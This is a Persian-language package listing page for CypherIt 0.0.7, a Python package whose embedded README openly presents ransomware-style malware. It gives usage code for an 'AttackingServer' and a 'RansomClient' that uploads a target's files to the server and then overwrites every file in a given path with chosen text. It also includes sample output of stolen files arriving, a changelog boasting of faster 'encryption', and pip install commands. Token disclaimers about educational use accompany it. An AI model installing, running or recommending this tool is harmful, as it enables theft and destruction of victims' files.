معرفی شرکت ها


CypherIt-0.0.7


Card image cap
تبلیغات ما

مشتریان به طور فزاینده ای آنلاین هستند. تبلیغات می تواند به آنها کمک کند تا کسب و کار شما را پیدا کنند.

مشاهده بیشتر
Card image cap
تبلیغات ما

مشتریان به طور فزاینده ای آنلاین هستند. تبلیغات می تواند به آنها کمک کند تا کسب و کار شما را پیدا کنند.

مشاهده بیشتر
Card image cap
تبلیغات ما

مشتریان به طور فزاینده ای آنلاین هستند. تبلیغات می تواند به آنها کمک کند تا کسب و کار شما را پیدا کنند.

مشاهده بیشتر
Card image cap
تبلیغات ما

مشتریان به طور فزاینده ای آنلاین هستند. تبلیغات می تواند به آنها کمک کند تا کسب و کار شما را پیدا کنند.

مشاهده بیشتر
Card image cap
تبلیغات ما

مشتریان به طور فزاینده ای آنلاین هستند. تبلیغات می تواند به آنها کمک کند تا کسب و کار شما را پیدا کنند.

مشاهده بیشتر

توضیحات

Renames all files and writes it with what ever you want. For more information check out my website:https://pypi.org/project/CypherIt/
ویژگی مقدار
سیستم عامل -
نام فایل CypherIt-0.0.7
نام CypherIt
نسخه کتابخانه 0.0.7
نگهدارنده []
ایمیل نگهدارنده []
نویسنده Fawaz Bashiru
ایمیل نویسنده fawazbashiru@gmail.com
آدرس صفحه اصلی -
آدرس اینترنتی https://pypi.org/project/CypherIt/
مجوز MIT
CypherIt ======== CypherIt is an intelligent tool which renames all the files to a txt file in a binder.You can write what ever you want. All the files of the target will be saved in your directory and you can do what ever you want. The name of the directory is the targets hostname Inspired by: ========== B.I.GG. He had this wonderful idea. BIG thanks to him HOW DOES CYPHERIT WORK ====================== If you are familiar to my style of packages. You already know how simple it is First of all create a server: Server ------ ````python import CypherIt as ci ip, port = "127.0.0.1", 1234 server = ci.AttackingServer(ip, port) server.start() ```` Client ------ ````python import CypherIt as ci ip, port, path, text = "127.0.0.1", 1234, r"C:\\test", "ALI THE MASTER" # You have to specify the path because this was just build for educational purposes. So please do not use it for bad thinks data = ci.RansomClient(ip, port, path, text) data.start() ```` Output of Server -------------- ```` Waiting for connection.... Connection has been established with ('192.168.0.73', 64328) 98_304 Bytes has been sent to the server "_" stands for point 18 files have been saved to your directory Waiting for connection.... ```` You always have to run the server first and then the client. The hostname of the target will be sent to your server A Directory with the hostname of the target will be created. All the data of target will be stored in that directory Additional ========= * PLEASE DO NOT HACK SOMEONE FOREIGN * If you see "Connection has been established" at the server than you have to wait a bit for the data to arrive Change Log ========== 0.0.1 (29/11/2022) ----------------- - First Release 0.0.2 (29/11/2022) ----------------- - Fix 0.0.3 (03/12/2022) ----------------- - More intelligent - Accurate connection - Folder in path can also be written to a txt file - file in the path will be overwritten even folders in the path - Faster overwriting (ps. Still slow but I am working on it) - Path error fixed 0.0.4 (04/12/2022) ------------------ - Better "encryption" - Better Server - MemoryError fixed - Capacity of bytes has been increased to 8kb - Python Package name fix 0.0.5 (07/12/2022) ------------------- - Way faster encryption - Better Code - New function "all_data" 0.0.6 (10/12/2022) ------------------- - New function "AI_check" this AI checks in every directory - New output - Bytes of target will be in the output - Change directory more accurate - Number of target files will be displayed at the output of the target 0.0.7 (06/01/2023) ------------------ - File count error fixed on server


نحوه نصب


نصب پکیج whl CypherIt-0.0.7:

    pip install CypherIt-0.0.7.whl


نصب پکیج tar.gz CypherIt-0.0.7:

    pip install CypherIt-0.0.7.tar.gz